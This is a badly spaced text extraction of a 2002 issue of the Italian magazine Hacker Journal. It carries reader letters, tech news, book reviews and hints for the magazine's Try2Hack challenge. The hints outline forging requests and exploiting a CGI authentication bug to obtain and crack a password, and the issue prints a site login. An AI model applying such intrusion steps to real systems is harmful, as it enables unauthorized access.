hacker.journal.n..7

È successo di nuovo. È il più tragico, mo-struoso e inconcepibile evento; due bambinesono state rapite e uccise in Agosto in Inghil-terra. Chi è il mostro? Qualcuno, come al so-lito, la spara: Internet, il capro espiatoriopreferito degli ultimi anni. Holly e Jessicafrequentavano chatline; avranno conosciutolì l'orco. E giù fiumi di inchiostro a coprire co-lonne dei quotidiani: sociologi, massmedio-logi, psicologi, tutti a descrivere le nefan-dezze della Rete. Poi, la svolta nelle indagi-ni: si scopre che in questo caso gli orchi nonstanno dietro a un computer, ma dietro allacattedra. Sono il bidello e la maestra dellascuola elementare frequentata dalle bambi-ne. Poco importa: il capro espiatorio preferi-to dalla stampa tornerà utile per un'altratragica occasione, magari maturata in real-tà dentro alla famiglia o all'oratorio.

[email protected]

HJ: intasate le nostre caselleOrmai sapete dove e come trovarci, appenapossiamo rispondiamo a tutti, anche a quelliincazzati. Parola di hacker. SCRIVETE!!!

Anno 1 � N. 7 - 29 agosto/12 settembre 2002

Boss: [email protected]: [email protected]: [email protected], Graphic designer: Marco Ranieri, Michele LovisonContributors: Daniele Festa (cover picture)

Publishing company4ever S.r.l.Via Torino, 51 20063 Cernusco sul NaviglioFax +39/02.92.43.22.35

PrintingStige (Torino)DistributoreParrini & C. S.PA. 00187 Roma - Piazza Colonna, 361-Tel. 06.69514.1 r.a.20134 Milano, via Cavriana, 14 Tel. 02.75417.1 r.a. Pubblicazione quattordicinaleregistrata al Tribunale di Milanoil 25/03/02 con il numero 190.Direttore responsabile: Luca Sprea

Gli articoli contenuti in HackerJournal hanno uno scopo prettamentedidattico e divulgativo. L’editoredeclina ogni responsabilita’ circal’uso improprio delle tecniche e deitutorial che vengono descritti al suointerno.L’invio di immagini ne autorizzaimplicitamente la pubblicazione gratuitasu qualsiasi pubblicazione anche nondella 4ever S.r.l. Copyright 4ever S.r.l.Testi, fotografie e disegni,pubblicazione anche parziale vietata.Realizzato con la collaborazione diHacker News Magazine - Groupe Hagal Aria

2 | www.hackerjournal.it

hack.er (hãk’∂r)

“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione e come espandere le loro capacità, a differenza di molti utenti, che preferisconoimparare solamente il minimo necessario.”

[email protected]

GRATIS!

Visita subito

www.hackerjournal.it

Usa le password che trovi a

pagina 7 per accedere alla

Secret Zone e crearti una

casella e-mail con indirizzo

[email protected]!

Avrai a disposizione 5 Mbyte

di spazio per i messaggi che

potrai leggere dal Web o con

il tuo client e-mail preferito.

Sbrigati! prima che qualcuno

si freghi il tuo nickname!

www.hackerjournal.it |3

Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac-king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si faper dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo diHacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi man-gia pane e worm).

UN GIORNALE PER TUTTI: SIETE NEWBIE O VERI HACKERS?

Questo spazio è vostro!Approfittatene, e fate lavorare quella tastiera!

OPEN SOURCE

Non avevo ancora i lcomputer quando im-parai a programmare.

Avevo 11 anni ed era il1986 quando a mio cu-

gino fu regalato un MSX.Avevo sempre des iderato

possederne uno, ma.. . Ahimè!A casa mia c 'erano spese ben più im-portanti e così l 'acquisto, di quello chetutti consideravano solo un videogio-co, non veniva mai preso in considera-zione. Così passavo i miei pomerriggiestivi a casa sua, mangiando pane eNutel la e f issando uno schermo conscr i t to a le t tere cubi ta l i "Loading. . .Please wait.. ." . Molti programmi eranoscritti in linguaggio macchina, altri inBasic. . . Naque così i l mio interesse per quellastrana serie di codici. Lettere e nume-r i apparentemente indeci frabi l i , mache sapientemente combinati poteva-no aprire le porte della creatività. Ri-cordo che lit igavo spesso con mio cu-gino. Lui voleva solo giocare. Io vole-vo capire come funzionava quel lasplendida macchina. Volevo rendermiconto se si poteva andare oltre... Alcu-ne volte mi lasciava solo a smanettarecol manuale e così poco alla volta ini-ziai a comprendere quella sequenzadi lettere e numeri. Imparai in fretta ealtrettanto in fretta svi luppai i mieiprimi programmi in Basic che registraisu cassette. Chi sa dove diavolo si tro-vano adesso!Passò qualche anno e mio cugino com-prò un Commodore 64 (Bella creaturaanche quel la! ) , cos ì i l caro vecchioMSX mi fu regalato. In breve acquistaipadronanza anche della nuova mac-china sv i luppandone del sof tware.

Quello che per me era solo un giocoiniziò a destare la curiosità dei mieiche mi incoraggiarono nella scelta diun tipo di studi adeguato. Mi iscrissi a ragioneria con indirizzoprogrammatore. Imparai i l Cobol, per-fezionai l 'analisi e lo svi luppo deglia lgor i tmi e . . . incredibi le ma vero. . .venni bocciato al primo anno! L 'am-metto è stata colpa mia, non avrei maidovuto sputtanare, tutte quelle volte,la mia insegnante davanti a tutta laclasse. Non ne capiva un razzo, fotte-va solo i soldi allo Stato. Continuava adire che gli esercizi proposti dal l ibrodi testo erano sbagliati, ma io li risol-vevo e lei l i lasciava sempre incomple-t i . Mi vendicai l 'anno success ivo,quando cambiai sezione. Riusci comunque a diplomarmi quasi apieni voti! Avrei voluto iscrivermi al-l 'università ma, dalle mie parti, i f iglidei camionisti e delle casalinghe nonsempre riesco a completare gli studi.Così mi ritengo fin troppo fortunato sesono riuscito a prendere il diploma! In seguito non avevo molta voglia difare il militare così frequentai un cor-so post-diploma imparando i l C++.Venne comunque il giorno di servire laPatria e così parti. . . Mi diedero l ' inca-r ico d i operatore informat ico . Tut tosommato fu una bella esperienza, la-voravo al CED con personale c iv i le(Ogni tanto passava anche qualchebella f ighetta!) , ho conosciuto ott imioperatori e geniali programmatori daiquali ho imparato tantissimo.Dopo il congedo mi sono subito rim-boccato le maniche e grazie alle mieconoscenze informat iche ho semprelavorato. Purtoppo ho avuto a che fa-re con disonesti che sfruttavano la mia

ingenuità di al lora. Ricordo che unavolta ho configurato 3 PC, ho format-tati gli HD infestati da virus di variogenere, e li ho collegati in rete. Il tut-to per la modica spesa di 150.000 peruna giornata di lavoro! Met tendoqualcosa da parte, sono così riuscitonel 1996 a comprare i l Pentium 100con il quale vi sto adesso scrivendo. In seguito ho sostenuto dei col loquicon alcune software house. Stronzi pu-re loro! Mi hanno fregato i sorgentidei fi le di prova e alla fine se ne sonosempre usciti con la frase "Cerchiamouna figura dinamica, laureata che..." .Andate in malora, chi diavolo vi cre-dete di essere?! Conosco lauretati in "Scienze dell ' in-formazione" che non conoscono la dif-ferenza tra un interprete e un compi-latore!!! E che non sanno scrivere duerighe di codice senza gli appunti delprofessore! ! ! L 'esperienza s i maturacon la pratica, con la passione e conl 'umiltà! Adesso ho 27 anni e faccio il ragionie-re in una piccola ditta, amo il mio la-voro e non lo cambieri per tutto il pre-stigio del mondo. Ho deciso di raccon-tare a Voi questa mia storia, perchèr i tengo le a l t re r iv is te su l mercatotroppo faziose. C'è in giro troppa gen-te che non ne capisce una beata sega!Stronzi, f ighetti, f igli di papà che, so-lo perchè hanno l 'u l t imo model lo diPC, r i tengono di capirne qualcosad'informatica. Gente che parla di maniera assurda"In questa picture le slides..." Ma par-late come magiate!!!

Francesco

OPEN SOURCE

I programmatori della vecchia guardia

Saremo

di nuovo

in edicola

Giovedì

12 sette

mbre!



SUGLI ARRETRATI ONLINE

Salve, prima di oggi leggevo suinternet la vostra rivista trovan-

dola molto interessante. Oggi hovisto che per farlo serviva una pas-sword che s i t rova sul la r iv is tastampata. Se per sfogliarla on-linedevo comunque comprarla, non va-le più la pena leggerla in internetdato che ce l 'ho in "carne ed ossa"fra le mani!Mi dispiace,anche perchè nel miopaese (Bisceglie,prov. Bari) non ri-esco a trovare la vostra rivista.Spe-rando che io possa tornare a legge-re la rivista on-line vi invio cordialisaluti.

gitetoma

I numeri arretrati presenti sul nostrosito sono pensati come un servizio inpiù per i nostri lettori, che possonofare affidamento su un archivio deinumeri eventualmente persi, e noncome una modalità di consultazionealternativa all 'acquisto in edicola.Non c'è bisogno di ricordare che noiviviamo solo ed esclusivamente conle vendite in edicola: non ci sonopubblicità, né palesi né occulte. Ba-sta comprare la rivista una sola vol-ta e si potrà godere di tutto l'archi-vio arretrati per due settimane: mipare un servizio molto conveniente edecisamente fuori dal comune (seconoscete altr i editori che fannoqualcosa di simile, fateci un fischio).

UNA STRANA PUBBLICITÀ

Un saluto a tutt i e complimentiper la rivista.

Sono un vostro fedele lettore e vole-vo segnalare un fatto sembratomialquanto strano....Nel TG2 dell'una del primo di ago-sto, è stato trasmesso un servizio suuna banda di "hacker" (come li hadefiniti il giornalista) che avrebbeviolato siti (tra cui quello della NA-SA) e svolgeva traff ic i i l leci t i . . . . i lpunto è che, mostrando il materiale

mailto:[email protected]

sequestrato dalla polizia, sono statimostrati dei giornali tra cui ho rico-nosciuto il vostro, si proprio "HackerJournal".Ora chi ha avuto il piacere, se nonl'onore, di sfogliare questa rivistaconosce cosa questa tratta e qualisono i suoi "principi", ma, mostran-do l ' immagine del giornale in unservizio non proprio di "cronaca ro-sa", cosa avrà pensato la gente "co-mune"?Non pensate che vi sia stata fattacattiva pubblicità??Secondo me, ciò ha influito molto ein senso negativo sull 'opinione al-trui (io me la sono presa un pò amale!!!)Qual è la vostra opinione in merito?CONTINUATE COSI'!!!!!!!!!!

Rushkio

Mah, oltre a Hacker Journal il servi-

zio riprendeva notebook, masteriz-zatori, modem e altri accessori se-questrati. Così come i produttori diquegli apparecchi non possono ave-re alcuna responsabilità per i fatticommessi da alcuni stupidi, lo stessovale per la nostra rivista.

VERGOGNOSO BOICOTTAGGIO?

Cara redazione di hackerjournal,vi scrivo poiché da molti mesi

sto assistendo ad una antipaticoquanto vergognoso boicottaggio daparte degli internet server providernei confronti di quei siti hacking chel iberamente esprimono i l propriopensiero e mettono a disposizionesoftware non conforme ai regola-menti dei provider.Bisogna ricordare che i virus e isoftware di per sé non sono né buo-ni né cattivi: tutto dipende dall'usoche se ne fa. Premesso questo, mi

Riceviamo da .Pillo-kill., e volentieri pubblichiamo, questa immaginerealizzata in grafica 3d.


NOPUBBLICITÀ

STAMPA

LIBERA

SOLO INFORMAZIONI

E ARTICOLI SOLO INFORMAZIONI

E ARTICOLI

STAMPA

LIBERASaremo

di nuovo

in edicola

Giovedì

12° settembre!

piacerebbe che nei prossimi numeridella vostra rivista pubblicherestedegli articoli su come scaricare soft-ware direttamente dai siti senza ve-dersi apparire il messaggio che re-cita pressappoco cosi: "Pops il soft-ware che cercavi non e' scaricabilein quanto rimosso perche' non con-forme alla politica di Arianna".

Mah, sai, un provider privato che tioffre spazio gratuito ha tutto il diritto

di stabilire le regole che vuole. Alcu-ni non accettano materiale pornogra-fico, altri se la prendono con exploite crack, altri ancora vietano siti daicontenuti violenti o razzisti (e non cela sentiamo di dargli torto). Non tipiace la policy di un sito di hosting?Cercane un altro: il bello di Internet èche puoi scegliere tra servizi similisparsi in tutto il mondo. Perché volera tutti i costi buggerare Arianna sca-valcando le sue imposizioni?

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI

TECNICHE DI INTRUSIONE

C iao ragaz z i , vo l e vo sape reuna cosa v i s to che vo i d hac-

k ing ve ne in tende te : io vo levosapere se es i s te un modo a l ter-nat i vo a i t ro jan per en t rare ne lPC d i una persona.

g i te toma

Sì , puoi usare un cacc iav i te . Peròt i a s s i c u ro che l ì den t r o s i s t amol to s t re t t i . A par te g l i scherz i ,

TRY2HACK:METTETE ALLAPROVA LA VOSTRA ABILITÀ

A parole siete tutti bravi, ma riuscite ve-ramente a passare dei livelli di protezio-ne? Dimostratelo al mondo e a voi stessicercando di superare i dieci livelli di dif-ficoltà del giochino Try2Hack (che si leg-ge "try to hack"), presente sul nostro sitowww.hackerjournal.it. Il gioco consiste nel superare i vari livel-li, inserendo ogni volta le password cor-rette (oppure arrivando in altri modi allepagine protette da password). Per farlo, potreste avere bisogno di alcu-ni programmi (Macromedia Flash, Softi-ce, VisualBasic). Di tanto in tanto qualche lettore ci scriveper dire che alcuni livelli sembrano nonfunzionanare. Noi vi possiamo assicura-re invece che tutti quanti funzionanoesattamente come dovrebbero. Chi ha orecchie per intendere...

Nuova password!Ecco i codici per accedere alla Secret Zonedel nostro sito, dove troverete informazionie strumenti interessanti. Con alcuni browser,potrebbe capitare di dover inserire due vol-te gli stessi codici. Non fermatevi al primotentativo.

user: chin8pass: 3mendo

Try2Hack, fate vedere di che pasta siete fatti!

gh Scores - High Scores - High Scores - Hig

Mandateci una mail a: [email protected] il numero del livello a cui siete arrivati e le pas-sword di tutti i livelli precedenti. Sui prossimi numeri pubbli-cheremo l’elenco dei migliori.

LIVELLO 7Tutto qui, direte voi? Basta fare clic per pas-sare al livello successivo? No. Le cose sonopiù complicate di quello che sembra. Per ac-cedere alla pagina dove inserire user namee password dovrete "falsificare" la richiestadi connessione. Poi, bisogna anche inserire idati giusti. Sotto.LIVELLO 8Per passare questo livello bisognerà sfrutta-re un baco del Cgi che si occupa dell'autenti-cazione. Come prima cosa quindi dovretescoprire quale sia, e poi fare una bella ricer-ca per trovare un suo baco famoso. Graziead esso, troverete il modo di procurarvi unnome utente e una password cifrata, da de-cifrare con un programma ad hoc. LIVELLO 9Anche il livello 6 utilizza un proIn questo li-vello ci si sposta su Irc. Seguendo le istruzio-ni fornite, si otterrà una frase da decifrare (ilmetodo è molto, molto semplice). Fatto ciò,si otterrà una password da utilizzare percollegarsi a un altro canale Irc, dove ci ver-rà comunicata una lunuga stringa binariada decodificare. Fatto ciò, si ottengono indi-zi per poter inserire il proprio nick tra gliutenti autorizzati del bot che darà la solu-zione per passare al livello 10.


by bye


le tecn iche sono svar ia te , anchese bene o male prevedono la pre-senza d i un se r v i z i o d i acces soremoto d i qualche t ipo (un serverte lnet o d i a l t ro t ipo) .

INCONTRI E RADUNI

È da un po ' d i tempo che leggola vos t ra r i v i s ta , natura lmente

dal pr imo numero e come paginapr inc ipale ho quel la d i HJ. Vorre iproporv i , come ogn i r i v i s ta chet ra t ta su l l 'hack ing, d i aggiungereuna nuova s e z i one , que l l a r i-guardan te g l i i ncon t r i o radun ine l le var ie loca l i tà i ta l iane.La cosa dovrebbe essere d i fon-damenta le a iu to per tu t t i que l l iche vogl iono scambiars i op in ion ie tecn iche su l l 'hack ing.

K INGHACK

Beh, se qualcuno vuole organiz-zare incont r i , raduni (o le imman-cabi l i p izzate) a s fondo tecn ico-hackeroso, può mandarc i una se-gnalaz ione: inser i remo vo lent ier il ' appuntamento ne l le news . Unasola raccomandaz ione: la r i v i s tav i ene ch i u sa d i e c i g i o rn i p r imadel la sua usc i ta in ed ico la. Man-da t e c i l a ma i l con un an t i c i posuf f i c ien te .

IMPRECISIONE SUL N. 6

S alve gent i le redaz ione d i hac-ker journal , vo levo segnalare

un errore in un ar t i co lo pubbl i-ca to ne l numero scorso. L 'ar t i co-lo (pag . 20 ) è in t i t o la to "Apr i t is e samo " . Bene , l ' au to r e SN4KEdice d i pro teggere la nos t ra pas-sword per la conness ione a l no-s t ro prov ider perchè " durante laconness ione sembrerà che s iamosta t i no i a connet terc i quando in-vece è s ta to lu i " , c ioè co lu i cheha usuf ru i to de l nos t ro usernamee password per connet ters i a in-t e rne t . NULLA D I P IU ' FALSO:quando noi c i connet t iamo a In-ternet i l nos t ro prov ider c i reg i-s t ra e c i ident i f i ca con i l numerod i t e l e f ono da cu i p rov i ene l ach iamata, e non con l 'username.

Quindi se qualcuno d i vo i in ten-de far danni a qualche server ( ol 'ha g ià fa t to ) , con username epasswd d i un amico, sappia chenon ha r i s o l t o n i en t e , pe r chéquando l ' admin de l se r ve r fa ràdenunc ia a l prov ider e g l i comu-nicherà l ' ind i r i zzo IP da cu i pro-veniva l 'a t tacco, i l prov ider for-n i rà a l l 'admin o a l le GDF, i l nu-mero te le fon ico da cu i provenivala ch iamata . Qu ind i a t t enz ionepr ima d i segu i re i s t ruz ion i sba-g l ia te senza acce t tars i d i c iò cheè s ta to sc r i t to . Gent i le redaz io-ne, se sbagl io r i spondetemi su l lar i v i s ta . . .

Advanced

Dic iamo che l 'au tent icaz ione av-v iene a ent rambi i l i ve l l i , s ia conusername e password, s ia con laregis t raz ione de l numero d i te le-

Joker ci manda questa immagine a metà stradatra l'Uomo Ragno e il maniaco dei giardinetti.

fono (è poi inut i le cercare d i na-sconder lo d isabi l i tando la funz io-ne d i r iconosc imento de l numerochiamante: i l dato v iene reg is t ra-to ugualmente dai prov ider ) .L 'a r t i co lo però non era in teso adare sugger iment i su come r ima-nere anonimi , ma su come ev i tareche qualcuno possa rubare i l no-s t ro account d i accesso per cer-ca r e d i f a l s i f i ca r e l a p rop r i aiden t i t à i n r e t e . È un po ' comequando un cr iminale fa una rapi-na con un 'auto rubata; anche seper fe t tamente innocente , i l leg i t-t imo propr ie tar io ha quanto menode l l e s cocc i a t u r e . S cocc i a t u r eche è sempre megl io ev i tare .

ETICA E MORALE HACK

V olevo ch iedere a i "grandi genide l l ' hack ing" d i cu i spesso ho

le t to le mai l pubbl ica te , se a lorosarebbe p iac iu to, quando eranoa l l e p r ime a rm i , che qua l cunop iu " b ravo " d i l u i ( c ' è s emprequalcuno + bravo d i no i ) s i d i-ve r t i s s e a en t ra rg l i ne l PC o a

Arretrati e abbonamentiSiete in tanti a chiederci se sia possibile ab-bonarsi o richiedere i numeri arretrati diHacker Journal, che ormai stanno diventan-do oggetti da collezione. Stiamo cercando diallestire le strutture necessarie, ma potreb-be essere necessario un po' di tempo. Intan-to, potete trovare i PDF di tutti i vecchi nu-meri sul sito nella Secret Zone, e già che sie-te sul sito, iscrivetevi alla nostra mailing list:sarete avvisati non appena i servizi abbo-namenti e arretrati saranno disponibili.


NOPUBBLICITÀ

STAMPA

LIBERA

SOLO INFORMAZIONI

E ARTICOLI SOLO INFORMAZIONI

E ARTICOLI

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI

STAMPA

LIBERASaremo

di nuovo

in edicola

Giovedì

12° settembre!

fa rg l i c rashare i l b rowser ; cos ìso l tan to pe r d imos t ra re che losa fare . METTETEVI CON QUELL I DELLAVOSTRA TAGL IA ! ! Cosa vo l e t eDIMOSTRARE?? Non mi cons ide-ro un hacker , perchè non pensodi potermi def in i re ta le so lo per-chè conos co i l SUB7 ! !( oooohh . . . . che hacke r ! ) , mapenso d i essere ne l g ius to quan-do af fermo che un VERO hackernon fa danni so lo per fars i nota-re , per d imost rare che c 'è o che" i l computer s icuro è so lo quel lospento. . . " ma per cercare d i a iu-tare g l i a l t r i ! Apprezzo e s t imo mol to tu t t i co-l o ro che me t t ono a p ro f i t t o l ep rop r i e conos cenze a s copo"uman i ta r i o " come ad e semp ioco lo ro che en t rano ne i cana l iI RC d i pedo f i l i e non appenaqua l cuno s i l a s c i a s cappa requalcosa. . . .Provo invece d isprezzo, anz i pe-na per co loro che g iochere l lanocon in ternet con i l so lo scopo d i

c reare scompig l io o d i romperele P***E. In par t i co lar modo noncomprendo i pr ima c i ta t i "grandigeni de l l 'hack ing" che s i but tanov ia cos ì , che s i sprecano in que-s to modo; penso accrescerebbe-ro ugua lmen te la p ropr ia fama(se è quel la che cercano) se cer-cassero a l t re s t rade e i f in i sa-rebbero p iù nobi l i .Spero pubbl ich ia te la mia mai l .Sono s icuro che non r i so lverà i lp rob lema ma forse qua lcuno c ifarà un pens ier ino. ; )

PS: v i a l lego una JPG su l lavoroche dovrebbero fare i lamer

ganda l f86

Hai tu t ta la nos t ra comprens ionee so l i da r i e t à , ganda l f86 . Pe rquan to c i r i gua rda , que l l i c hefanno cose come que l le che de-s c r i v i non sono e non sa rannomai "gen i de l l 'hack ing" .

A partire da questo numero abbiamo deciso difare un po' più sul serio con il sondaggio presen-te sul sito: abbiamo lasciato da parte i quesitisulla distribuzione Linux più fica o sul browsermigliore, per affrontare temi di cui spesso non siparla in pubblico. A quanto pare, la cosa piaceanche a voi, visto che avete votato in tanti (3114,più del doppio dei precedenti sondaggi).La stragrande maggioranza dei lettori che han-no risposto (80%), ritiene che è lecito entrareabusivamente in un sistema se non si danneg-gia nulla o se si avverte l'amministratore dellafalla di sicurezza che ha permesso la violazione.Saremmo curiosi di sapere in quanti avrebberorisposto allo stesso modo se la domanda fossestata posta in senso inverso, e cioè "ritieni che siagiusto che altri possano penetrare nel tuo com-puter, se non danneggiano nulla o se ti avvisanodella falla di sicurezza?". Siete proprio sicuri chenon avreste problemi se qualcuno si mettesse aleggere i vostri file personali, o sbirciasse tra lefoto delle vostre vacanze? (O nella "collezione"che avete in quella cartella nascosta?)Considerazioni etiche a parte, ricordate comun-que che, per la legge, entrare abusivamente inun sistema altrui è sempre un reato penale (art615 ter del Codice Penale), punibile con pene fi-no a tre anni di prigione se non si danneggianulla, fino a cinque anni se oltre alla violazionec'è anche distruzione o cancellazione di dati, eda tre a otto anni se si attaccano sistemi relativialla sicurezza pubblica o alla sanità o alla prote-zione civile o comunque di interesse pubblico.

news

HOT! ! PGP È VIVO E LOTTA INSIEME A NOI!

Da molto tempo il più celebre programma dicifratura per PC, Pretty Good Privacy (PGP

per gli amici) sembrava destinato a non riceve-re aggiornamenti. Network Associates(www.nai.com), che lo aveva acquistato nel 97,dopo aver sfruttato la tecnologia alla base diPGP per alcuni prodotti della linea McAfee, ave-va posto uno stop allo sviluppo del programma(l'ultima major release di PGP, la 7, risale al set-tembre 2000). Nemmeno l'uscita di come Win-dows XP o Mac OS X, sembrava stimolare larealizzazione di una nuova versione ad hoc perquesti nuovi sistemi operativi. Il 19 agosto scorso però si è intravista una lucedi speranza: Network Associates ha infatti ce-duto tutti i prodotti PGP alla neonata PGP Cor-

p o r a t i o n(www.pgp .com) ,fondata per l'occasio-ne da alcuni managerche avevano in pas-sato lavorato allo svi-luppo e alla commer-cializzazione di PGP. Ilprogramma quindinon è più un prodottomarginale di un'azien-da che ha ben altri in-teressi nel campo de-gli antivirus, comeMcAfee, ma il pro-dotto di punta di un'a-zienda più piccola mapiù motivata. I risul-tati non si sono fattiattendere, e PGP Cor-poration ha annun-

ciato il rilascio della versione 8 di PGP, che saràcompatibile anche con Windows XP e Mac OSX, e includerà nuove funzionalità come il sup-porto di Lotus Notes (per Windows) e la possi-bilità di leggere e scrivere volumi creati conPGPDisk su piattaforme differenti.Due tra gli annunci fatti da PGP Corporation so-no particolarmente graditi: il primo è che il codi-ce sorgente delle nuove versioni continuerà aessere rilasciato pubblicamente, per permettereuna revisione del codice (unica vera garanziacontro eventuali backdoor inserite dal produtto-re per favorire governi o aziende); il secondo an-nuncio gradito è che continuerà a essere distri-buita una versione gratuita di PGP, per uso noncommerciale. K

Doveva essere in edicola il 12 agosto ma ha ritar-dato qualche giorno...

Ma ora è finalmente arrivata la rivista più divertentedell�anno! Correte in edicola a comprare PC Smile, lanuova rivista, con un Cd-Rom in regalo pieno zeppo difilmati divertentissimi, giochi realizzati inFlash, finti virus (da usare con attenzione!),immagini sexy e vignette umoristiche dautilizzare come sfondo del desktop o dainviare agli amici. PC Smile è utilizzabilesia dagli utenti Mac, sia da quelli Windows.

Scriveteci cosa ne pensate !Nell�ultima pagina di Hacker Journal trovate unbuono sconto di 1Euro per l�acquisto del primo nu-mero di PC Smile! K

"MICROSOFT HA MIGLIORATO L'OPEN SOURCE, COMEBILL LADEN HA MIGLIORATO LA SICUREZZA NEGLIAEREOPORTI"

> Eric S. Raymond

! PC SMILE FINALMENTE È IN EDICOLA!

! CLAMOROSO:LA CASA BIANCA ISTIGAGLI HACKER

Durante il suo intervento al raduno hackerBlack Hat Security di Las Vegas, il consi-

gliere della Casa Bianca Richard Clarke haaccusato pesantemente l�industria del soft-ware per i numerosi bachi che infestano iprogrammi. E non si è limitato a questo: ri-volgendosi alla platea, ha invitato gli hackera continuare a ricercare bachi e falle nella si-curezza di software e sistemi, avvisando poii produttori affinché ci mettano la solita top-pa (o le strutture governative se questi, co-me spesso accade, non ci sentono molto daquell�orecchio). Qualcuno ha obiettato che lesoftware house non devono contare sul la-voro (gratuito) degli hacker per risolvere ipropri problemi, ma che devono farlo in pri-ma persona. Gli animi si sono nuovamenterasserenati quando Clarke ha duramente cri-ticato quelle software house che biasimano(o addirittura querelano) quegli hacker cheindividuano i bachi e informano la comunitàinformatica dei rischi relativi. K

! AGGIORNAMENTOSICUREZZA MAC OS X

Il 2 agosto Apple ha rilasciato un importan-te update per migliorare la sicurezza di

Mac OS X. I moduli che sono stati modifica-ti sono Apache, OpenSSH, OpenSSL,SunRPC e mod_ssl. L'aggiornamento richiede la presenza dellaversione 10.1.5 di Mac OS X e si può instal-lare automaticamente tramite l'utility Soft-ware Update del sistema. K

! OPENOFFICEANCORA PIÙ APERTO

Accogliendo le richieste avanzate dallapropria comunità di sviluppatori open

source, Sun Microsystems ha modificato leproprie licenze riguardanti lo sviluppo del co-dice e della documentazione per Open Offi-ce. Tutto il codice sorgente sarà licenziatosotto la GNU Lesser General Public License(LGPL) e la Sun Industry Standards SourceLicense (SISSL); agli sviluppatori che offri-ranno porzioni di codice verrà garantito ilmantenimento della paternità del proprioprodotto. K


PCSmile

news

HACKBOOK

" HACKER DIARIES: CONFESSIONIDI GIOVANIHACKERAutore: Dan VertonISBN: 88-386-4283-4Pagine: 272Prezzo: € 15,00Editore: McGraw-Hill

Aprima vista, il libroparrebbe rivolgersi a chi vuole farsi un'idea

del mondo dell'hacking. Il comunicato stampadel libro infatti promette: "Entrerai nel mondo del-la caccia internazionale ai pirati della ciberneticae nella mente degli adolescenti hackers". In que-sta dichiarazione, il tradizionale accoppiamentohacker=criminali non fa presagire molto di buo-no. Andando a spulciare però, si possono trova-re interessanti informazioni sulla storia dei piùeclatanti attacchi degli ultimi anni, parecchie in-terviste ad agenti dell'FBI, psicologi criminali,agenti di pubblica sicurezza e anche ad hacker,in attività e non. K

" LINUX MUSICAE SUONIAutore: Dave Phillips ISBN: 88-8378-020-5Pagine: 480 Prezzo: € 29,95 Editore: Hops Libri

Che vogliate risolvere pro-blemi nella trattazione del-

l'audio da parte del pinguino, o trasformare la vo-stra Linux box in uno studio di registrazione mu-sicale, questo è il libro che fa per voi. Linux Mu-sica & Suoni offre un'approfondita introduzioneper cominciare a registrare, archiviare e suonaremusica con il sistema operativo Linux. Gli argomenti trattati sono: - registrare, mixare e aggiungere effetti musicali- lavorare con file Mod, Midi e Mp3- archiviare e masterizzare brani- utilizzare software di sintetizzazione musicalecome Csound- impostare il sistema per condividere le risorsemusicali del PC- trasmettere dal vivo su InternetPer ogni argomento, vengono presentate le ap-plicazioni relative. Al libro è associato anche unsito Web, zeppo di risorse e link utili. K

! BUGTRAQ SI VENDE A SYMANTEC!

In Luglio Symantec ha acquisito per circa75 milioni di dollari SecurityFocus

(www.securityfocus.com), l'azienda chepubblica BugTraq, la mamma di tutte lenewsletter sulla sicurezza informatica, natanel remoto 1993. La notizia non è stata pre-sa molto bene dai lettori della newsletter, eanche da alcuni dirigenti di Security Focus,

che pare stiano per la-sciare l'azienda. La pauraè che, nonostante le ras-sicurazioni a riguardo,Symantec possa modifi-care la linea editoriale diBugTraq, tradizionalmen-te orientata al "full dis-closure" (cioè alla pub-blicazione di tutte le in-formazioni su bachi edexploit), o che addirittu-ra Symantec possa cen-surare o manipolare in-formazioni per promuo-

vere i propri prodotti relativi alla sicurezza, oper non danneggiare l'immagine di importan-ti partner (per esempio uno, che ha sede aRedmond, produce sistemi operativi e passaa Symantec informazioni vitali per la produ-zione dei popolari antivirus. Insomma, il temadel conflitto di interessi non riguarda soltan-to l'Italia... K

Un paio di numeri fa abbiamo parlatodel wardriving la pratica che consiste

nel mettersi al volante di un auto con unportatile dotato di connessione wireless,e andare in giro perla città cercandopunti di accessosenza protezioni disicurezza. Ebbene,alcuni membri delb l o gwww.e3.com.au,che si occupa di re-ti wireless, hannospinto il concettoun po' più in la, omeglio, un po' piùin alto. Sorvolandola città di Perth conun piccolo aereo-plano, alla quota di50 metri, hanno tro-vato 92 basi di ac-cesso sprotette inun colpo solo. Perl'esperimento sonostati usati un pal-mare Compaq Ipaq

con antenna esterna e il programmaNetstumbler, e un notebook Toshiba Te-cra 9000 con antenna incorporata e ilprogramma Kismet. K

! WARDRIVING AL VOLO

www.hackerjournal.it | 9

censurato


by bye

HJ ha surfato per voi...15 minuti di celebrità! Questi sono i vostriI classici

della Rete

www.robertgraham.com/pubs/hacking-dict.htmlIstruttivo dizionario del gergohacker, che accanto alladefinizione tecnica delle varieparole elencate, descrive anche illoro significato nella culturahacker (per esempio, si da ladefinizione del file virtuale/dev/null ma si dice anche infrasi come "Se non ti piace quelloche faccio, manda pure i tuoicommenti in /dev/null). Meritanouna visita anche i livellisuperiori, dove si trovanoinformazioni sullo sniffing e unaraccolta di consigli e aneddotisulle visite ai siti porno durante

www.virused2.too.it

Io sono VIRUSED2 e ho 20 anni. Vi chiedo di pubblicare il miosito sulla vostra rivista. Vi assicuro che farà un figurone sullevostre pagine .Ciao a tutti e... COMPLIMENTI !!!

..:: VIRUSED2 ::..

Qualcuno sente la mancanza dei teschi?

www.s0ftpj.orgButchered form Inside (BFi pergli amici) è una storica ezine ita-liana. Il livello qualitativo è mol-to elevato, sia sul piano tecnico,sia su quello editoriale: anche lalettura di articoli su argomentitecnici e tutto sommato noiosi, sipuò rivelare molto divertente.Ultimamente ha fatto parlaremolto di sé per la pubblicazionedi articoli sul funzionamentodella rete Fastweb, completi diprogrammi per superare alcunilimiti tecnici del provider a largabanda.

www.spysystem.it

Vorrei mettere il linkdel mio sito su HAC-KER JOURNAL.Il mio sito parla di si-curezza, perché peressere al sicuro deviprima conoscere letecniche hacker.Grazie 1000

Non sono forse duemodi di vedere lastessa cosa?


siti; scegliete voi se tirarvela o vergognarvi I classicidella Rete

www.wizard4.cjb.net

Ciao,volevo chiedervi se po-tevate inserire nella ri-vista il link al mio sito.Grazie!

Ciao bywizard4

http://solitaireknight.supereva.it

